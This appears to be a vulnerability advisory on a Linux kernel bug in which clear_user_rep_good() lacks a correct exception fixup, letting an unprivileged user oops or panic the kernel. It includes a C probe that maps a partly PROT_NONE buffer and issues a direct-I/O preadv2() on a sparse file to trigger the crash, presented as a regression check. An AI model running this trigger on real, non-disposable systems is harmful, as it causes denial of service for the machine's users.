Linux Kernel Exception Handling Vulnerability in Memory Clearing Function

Vulnerability

A bug has been identified in the Linux kernel's x86 routine for clearing user memory. In clear_user_rep_good(), the exception table annotation was attached to the wrong instruction: it pointed at a register move immediately preceding the 'rep stos' that actually touches user memory, instead of at that access itself. When a kernel-mode access to a user address faults, the x86 page fault handler looks up the exact address of the faulting instruction in the exception table and resumes at the registered fixup. Because the faulting 'rep stos' has no entry of its own, the lookup finds nothing, the fault is treated as an unrecoverable kernel fault, and the kernel oopses instead of letting clear_user() report the uncleared bytes to its caller, which would return -EFAULT to user space. According to the fix, the mis-annotation was introduced by an earlier optimization of the user memory clearing routines.

Impact

Triggering the bug produces a kernel oops ("BUG: unable to handle page fault for address") for what should be an ordinary, recoverable fault on a user address: the faulting task is killed, and on systems configured with panic_on_oops the whole machine panics. An unprivileged local user who can issue the triggering read therefore has a denial of service. Because the oops backtrace runs through the filesystem's direct I/O read path, the report is easy to misread as a filesystem error when the root cause is the missing exception fixup in the user-access routine.

Reproduction

The bug is reached through the preadv2() system call. A direct I/O read on ext4 that has to return zeros to user space (the direct I/O read path zero-fills the user buffer with iov_iter_zero(), which calls clear_user()) ends up in clear_user_rep_good(). If the destination buffer faults, for example because part of it is unmapped or not writable, the access faults at the mis-annotated instruction, no fixup is found, and the kernel oopses where a fixed kernel returns EFAULT or a short read.
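A user-space probe for the scenario described above, written as an added example for this page rather than taken from the kernel or from any published reproducer. It assumes: a sparse file created by ftruncate(), whose direct I/O read is satisfied by zero-filling the user buffer; a buffer whose first page is writable and whose second page is PROT_NONE, so the fault lands at the page boundary; and a read length that is not a multiple of 8, on the assumption (taken from the report's description of a mis-annotated instruction preceded by a register move) that it is the byte-granular tail of the clear that lost its fixup. The probe is a regression check: on a fixed kernel preadv2() returns EFAULT or a short count; on an unfixed kernel it would oops, so run it only on a disposable test system.

```c
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/mman.h>
#include <sys/uio.h>
#include <unistd.h>

/* How the kernel answered the probe read. */
enum probe_result {
    PROBE_FAULT_HANDLED,  /* -EFAULT or a short count: the fault was fixed up */
    PROBE_NO_DIRECT_IO,   /* O_DIRECT not available here; the path was not exercised */
    PROBE_SETUP_FAILED,   /* temp file, mapping, or an unexpected errno */
    PROBE_FULL_COUNT      /* the kernel claims it filled a PROT_NONE page: impossible */
};

/* Interpret preadv2()'s return value and errno. Kept separate from the
 * probe so the interpretation can be tested without touching the kernel. */
enum probe_result classify_probe(ssize_t n, int err, size_t requested)
{
    if (n < 0) {
        if (err == EFAULT)
            return PROBE_FAULT_HANDLED;
        if (err == EINVAL)          /* direct I/O refused by this filesystem */
            return PROBE_NO_DIRECT_IO;
        return PROBE_SETUP_FAILED;
    }
    if ((size_t)n < requested)      /* zeroed up to the PROT_NONE page, then stopped */
        return PROBE_FAULT_HANDLED;
    return PROBE_FULL_COUNT;
}

/* Issue a direct I/O read of a hole-only file into a buffer whose second
 * page is PROT_NONE, with a length that is not a multiple of 8 so the fault
 * lands in the trailing bytes of the clear (assumption, see lead-in). */
enum probe_result probe_clear_user(const char *dir)
{
    size_t page = (size_t)sysconf(_SC_PAGESIZE);
    size_t requested = page + 3;
    char path[4096];
    snprintf(path, sizeof path, "%s/clear_user_probe.XXXXXX", dir);

    int fd = mkstemp(path);
    if (fd < 0)
        return PROBE_SETUP_FAILED;
    unlink(path);

    /* Extend the empty file without writing data: the whole range is a hole,
     * and a direct read of a hole is satisfied by zeroing the user buffer. */
    if (ftruncate(fd, (off_t)(2 * page)) < 0) {
        close(fd);
        return PROBE_SETUP_FAILED;
    }
    if (fcntl(fd, F_SETFL, O_DIRECT) < 0) {
        close(fd);
        return PROBE_NO_DIRECT_IO;
    }

    /* Page 1 writable, page 2 PROT_NONE: the 8-byte stores into page 1
     * succeed and the 3-byte tail that crosses into page 2 faults. */
    char *buf = mmap(NULL, 2 * page, PROT_READ | PROT_WRITE,
                     MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (buf == MAP_FAILED) {
        close(fd);
        return PROBE_SETUP_FAILED;
    }
    if (mprotect(buf + page, page, PROT_NONE) < 0) {
        munmap(buf, 2 * page);
        close(fd);
        return PROBE_SETUP_FAILED;
    }
    memset(buf, 0xAA, page);   /* so zero-filling of page 1 is observable */

    struct iovec iov = { .iov_base = buf, .iov_len = requested };
    errno = 0;
    ssize_t n = preadv2(fd, &iov, 1, 0, 0);   /* the syscall named in the report */
    int err = errno;

    enum probe_result r = classify_probe(n, err, requested);
    munmap(buf, 2 * page);
    close(fd);
    return r;
}

int main(void)
{
    static const char *const names[] = {
        "fault handled (EFAULT or short read)",
        "direct I/O not available on this filesystem",
        "setup failed",
        "full count returned into a PROT_NONE page (unexpected)",
    };
    enum probe_result r = probe_clear_user("/tmp");
    printf("probe result: %s\n", names[r]);
    return r == PROBE_FAULT_HANDLED ? 0 : 1;
}
```

Whether clear_user_rep_good() is reached at all depends on the CPU: the kernel dispatches clear_user() to the rep_good variant only when the CPU reports REP_GOOD but not ERMS, so on an ERMS machine the probe exercises a different clearing routine and cannot hit the mis-annotated instruction. On a filesystem that refuses O_DIRECT the probe reports that direct I/O was unavailable rather than a verdict. preadv2() needs glibc 2.26 or newer; on older libraries use syscall(SYS_preadv2, ...) instead.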

Remediation

Apply the fix from the Linux kernel stable tree. It moves the exception table annotation from the register move to the instruction that performs the user access, so a fault there is fixed up and clear_user() reports the uncleared bytes as intended. After updating, a direct I/O read into a partly unmapped buffer should return EFAULT (or a short count) instead of producing an oops.

Added: Oct 7, 2025, 5:36 PM
Updated: Oct 7, 2025, 5:36 PM

Vulnerability Rating

Custom Algorithm

spread: 9.0
impact: 2.5
exploitability: 5.7
remediation: 7.7
relevance: 0.6
threat: 4.8
urgency: 2.9
incentive: 1.7

Our algorithm analyzes dozens of metrics to generate these 8 key vulnerability categories, which are then combined to calculate the overall risk score.